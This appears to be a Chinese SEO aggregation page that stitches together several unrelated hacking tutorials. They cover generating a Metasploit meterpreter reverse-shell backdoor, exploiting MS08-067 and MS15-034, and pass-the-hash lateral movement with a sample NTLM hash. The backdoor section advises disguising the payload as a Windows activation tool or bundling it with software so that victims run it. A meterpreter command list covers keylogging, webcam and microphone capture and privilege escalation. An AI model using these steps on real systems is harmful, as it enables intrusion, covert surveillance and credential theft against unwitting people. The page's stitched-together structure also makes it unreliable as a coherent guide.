包含靶机系统windows8的词条

Kali利用msf渗透Windows电脑(超详细)前言
最近整理了一些奇安信华为深信服大佬的课件资料 大厂面试课题 , 想要的可以私信自?。?无偿赠送 给粉丝朋友~
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件 。
MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中 。自2015年6月8日起,msfvenom替换了msfpayload和msfencode 。
演示环境
使用Kali 2021.3进行演示操作
目标靶机: Win10专业版
软件:msfvenom、msfconsole(Kali系统内置)
1.进入管理员模式
命令: sudo su
解释: 不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令
命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip LPORT=本地端口号 –f exe –o 文件名.exe
解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址
本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就性
文件名可以随便写自己喜欢的名字,比如写Win10激活工具 , 可能更容易让目标主机上钩
当然MSF也可以用来渗透手机、mac、Linux等
接下来运行命令生成文件
默认生成的文件在根目录下
把刚才生成的文件放到目标靶机Win10系统中
命令:msfconsole
(1)命令: use exploit/multi/handler(选择模块)
(2)命令: set payload windows/meterpreter/reverse_tcp(选择攻击模块)
(3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址)
(4)命令: set lport 1111(填写刚才生成文件时的端口号)
(5)命令: show options(查看设置参数)
(6)命令: exploit -z -j(后台执行)
我们这里也可以把这个程序伪装一下 , 把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面
(1)命令:sessions(查看上钩的用户)
(2)命令:sessions -i 1(选择需要攻击的用户,这里选择第 1 个
命令:run vnc -i
cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件(ls 的别名)
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程
keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频 , 对方会有弹窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (.wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本
————————————————
原文链接:
MS15-034复现漏洞主要影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统 。IIS6.0以上 。
靶机:win7iis7
win7安装好iis服务后访问80端口,检测是否存在漏洞:使用curl发送以下数据
curl-H "Host: 192.168.137.129" -H "Range: bytes=0-18446744073709551615"
当出现Requested Range Not Satisfiable时说明存在漏洞 。
使用metasploit的auxiliary/dos/http/ms15_034_ulonglongadd模块可直接造成服务器蓝屏,
使用auxiliary/scanner/http/ms15_034_http_sys_memory_dump模块检测时仅针对:windoiws 8.1, 2012, or 2012R2有效 。
黑客是用什么系统进入别人的电脑?黑客一般用kali
linux系统 。一般黑客很少针对个人进行攻击,如果针对个人那么可以用钓鱼网站和木马软件 , 靶机点开钓鱼网站或木马软件后 , 你的终端就能看见靶机的IP , 和使用的系统,主要看你做的木马怎么样了 。
你先会最少5门编程语言再说吧 。
虚拟机玩渗透 目标虚拟机 需要怎么设置网络VMWare虚拟机搭建渗透测试的网络环境
1. 问题的提出
通过虚拟机运行Kali Linux或者OWASP WTE , 需要靶机来进行渗透测试的学习和研究 。比较简单的方式是 , 靶机也作为虚拟机运行;在渗透机与虚拟机之间建立专门的网络连接 。
使用VMWare提供的LAN区段(LAN Segament)是个简单、快捷的解决方案 。
2. 步骤说明
设置LAN区段 - 在VMWare中
靶机和渗透机的虚拟机设置 - 在VMWare中
靶机和渗透机的系统网络设置 - 虚拟机内部
2.1 LAN区段(LAN Segament)设置
在VMWare Workstation中,打开目标虚拟机的“虚拟机设置”标签,点选“LAN区段” , 如下图:
![点击这里的"LAN区段"按钮]()
点击之后 ,
如果没有设置过LAN区段 , 则新建一个LAN区段
如果已经设置过,则选择目标所在的LAN区段
2.2 渗透机/靶机虚拟机设置
在完成了上述LAN区段设置后,虚拟机的网络连接模式设置为“LAN区段”,并选择上述设置的具体区段 。
虚拟机和靶机的**设置方法相同** 。
2.3 渗透机/靶机的系统设置
进入虚拟机系统内部 , 需要手动指定IP地址,确保渗透机和靶机在同一网段内 。
虚拟机和靶机的**设置方法相同** 。
Windows的设置比较简单 。
对于没有图形界面的Linux , 手动设置方法如下:
1. 关闭网卡,目的在于**清除之前的网络设置**
precode$ ifconfig eth0 down/code/pre
2. 设置新的IP地址等信息,并启动网卡
precode$ ifconfig eth0 192.168.xx.123 netmask 255.255.255.0 up/code/pre
注意,这里最后的up是启动网卡的意思
3. 设置网关gateway,需要使用route命令
precode$ route add default gw 192.168.xx.1
对于有图形界面的Linux,有时候会出现Network Manager显示"device not managed"的情况,特别是在Debian或者Kali底下 。
1. 问题是因为同时满足以下条件:
(1) /etc/network/interface文件中包括目标设备(网卡);
(2) /etc/NetworkManager/NetworkManager.conf中没有设定自动管理 。
2. 问题解决方法:
(1) 在/etc/NetworkManager/NetworkManager.conf中,设置managed=true
(2) 重启network manager:
precode$service network-manager restart/code/pre
ms08-067 复现 , 使用metasploit 时间:2022-03-10
一、环境准备
1、需要准备英文的windows xp 环境 。
链接:
提取码:y8mj
2、攻击工具使用的是metasploit,kali 自带 。
二、复现时存在的问题
1、安装完xp之后,我自己已经复现了一次,发现拿到的system没有相关命令 , 可能是这个新系统没有添加到环境中,之后建立了一个文档进行读取,也可直观的看到结果 。其他就没遇到什么问题了 。
三、复现演示
1、虚拟机准备一下xp,建立一个test的文档,查看一下靶机 IP,靶机建立完成
2、使用metasploit 进行攻击
1)、msfconsole #进入metasploit
2)、search ms08-067 #搜索相关exp
3)、use exploit/windows/smb/ms08_067_netapi #使用这个exp
4)、show payloads #搜索相关payload,能让攻击后建立连接
5)、set payload generic/shell_bind_tcp #我使用的是这个
6)、set RHOST 192.168.154.144 #设置靶机IP,让它攻击这个IP , 端口默认是445,这个就不需要设置了
7)、show options #可以用这个命令查看是否把相关配置设置全了
8)、run 或 exploit #进行攻击,两个命令都可以
9)、type test.txt #之后攻击成功了 , 使用windows命令 就可以去相关路径下查看那个 test 文档了
演示图:
横向渗透之Pass The Hash 在上一章总结了windows抓取hash的一些方式 。在实际场景中,我们需要更快的扩大战果,获取更多控制权限 , 以及定位域环境 。
横向渗透:就是在得到一台主机的控制权限后,将该主机作为突破口、跳板 , 利用既有的资源尝试获取更多的凭据、更高的权限,进而达到控制整个内网、拥有最高权限 。
Pass The Hash 哈希传递简称PTH,可以在不需要明文密码的情况下,利用LM HASH和NTLM HASH直接远程登录 。攻击者不需要花费时间来对hash进行爆破,在内网渗透里非常经典 。
常常适用于域/工作组环境 。
靶机:windows server 2008
IP:10.211.55.19
domain:workgroup
user:administrator
pass:cseroad@2008
NTLM-Hash:82c58d8cec50de01fd109613369c158e
psexec类工具大同小异,大部分工具都是通过psexec来执行的 。原理是: 通过ipc$连接,将psexesvc.exe释放到目标机器,再通过服务管理SCManager远程创建psexecsvc服务,并启动服务 。然后通过psexec服务运行命令,运行结束后删除该服务 。
如:Metasploit psexec , Impacket psexec,pth-winexe,Empire Invoke-Psexec
缺点:容易被杀软检测到
优点:可以直接获取system权限
因为市面工具比较多 , 只kali就自带有很多 。所以这里以好用、批量为准则选择了几款工具 。
mimikatz中pth功能的原理:
windows会在lsass中缓存hash值,并使用它们来ntlm认证,我们在lsass中添加包含目标账号hash的合法数据结构,就可以使用类似dir这些命令进行认证 。
正常访问server 2008 的盘符是需要用户名密码的 。
在windows7上经过pth之后就不需要密码就可以远程连接 。
将获取的hash添加进lsass中 。
在windows 7 上执行以下命令:
执行后会弹出cmd 。在cmd下执行 net use \\10.211.55.19\c$ 命令就可以远程连接 。
扩展:
假如我们继续探测到10.211.55.8使用的是同一个hash值 。我们尝试使用远程共享c盘和schtasks 定时计划任务执行获取一个session 。
powershell.bat为
当重启10.211.55.8机器后,metasploit可得到session
笔者经常使用时的是这三个模块
以exploit/windows/smb/psexec模块为例
值得一说的是smbpass配置项支持明文密码也支持hash(LM-Hash:NTLM-Hash)
成功返回system权限 。
CobalStrike 同样有psexec选项 。
在得到一个beacon的基础上,先在该网段portscan , 探测存活主机后 。
选择View--Target--Login--psexec,可批量选择主机pth 。
选择pth的用户名和hash值 。
从执行的命令看得出依然利用的mimikatz 。执行成功后返回system权限 。
该工具可以对C段主机批量pth 。
项目在 github
在kali上直接apt就可以安装
对工作组批量pth命令如下
测试的时候发现某些命令执行后没有回显 。
更多资料参考:
CrackMapExec:域环境渗透中的瑞士军刀
红队测试工具-CrackMapExec-远程执行Windows命令
wmi内置在windows操作系统,用于管理本地或远程的 Windows 系统 。wmiexec是对windows自带的wmic做了一些强化 。攻击者使用wmiexec来进行攻击时,不会记录日志,不会写入到磁盘,具有极高的隐蔽性 。
安装成功后,切换到examples目录下
运行命令为
先加载Invoke-WMIExec.ps1脚本,再加载Invoke-TheHash.ps1脚本,因为Invoke-TheHash 里要用到 Invoke-WMIExec方法
如果要执行系统命令 。可以加-Command 参数
执行后该进程会在后台运行 , 可以结合定时任务执行尝试反弹shell 。
在测试中发现,在打了kb2871997 这个补丁后,常规的Pass The Hash已经无法成功,但默认的Administrator(SID 500)账号例外,利用这个账号仍可以进行Pass The Hash远程ipc连接 。
以上所有操作均针对的SID 500 。
内网渗透之PTHPTTPTK
横向移动
丢掉PSEXEC来横向渗透
【包含靶机系统windows8的词条】关于靶机系统windows8和的介绍到此就结束了,不知道你从中找到你需要的信息了吗 ?如果你还想了解更多这方面的信息,记得收藏关注本站 。

    推荐阅读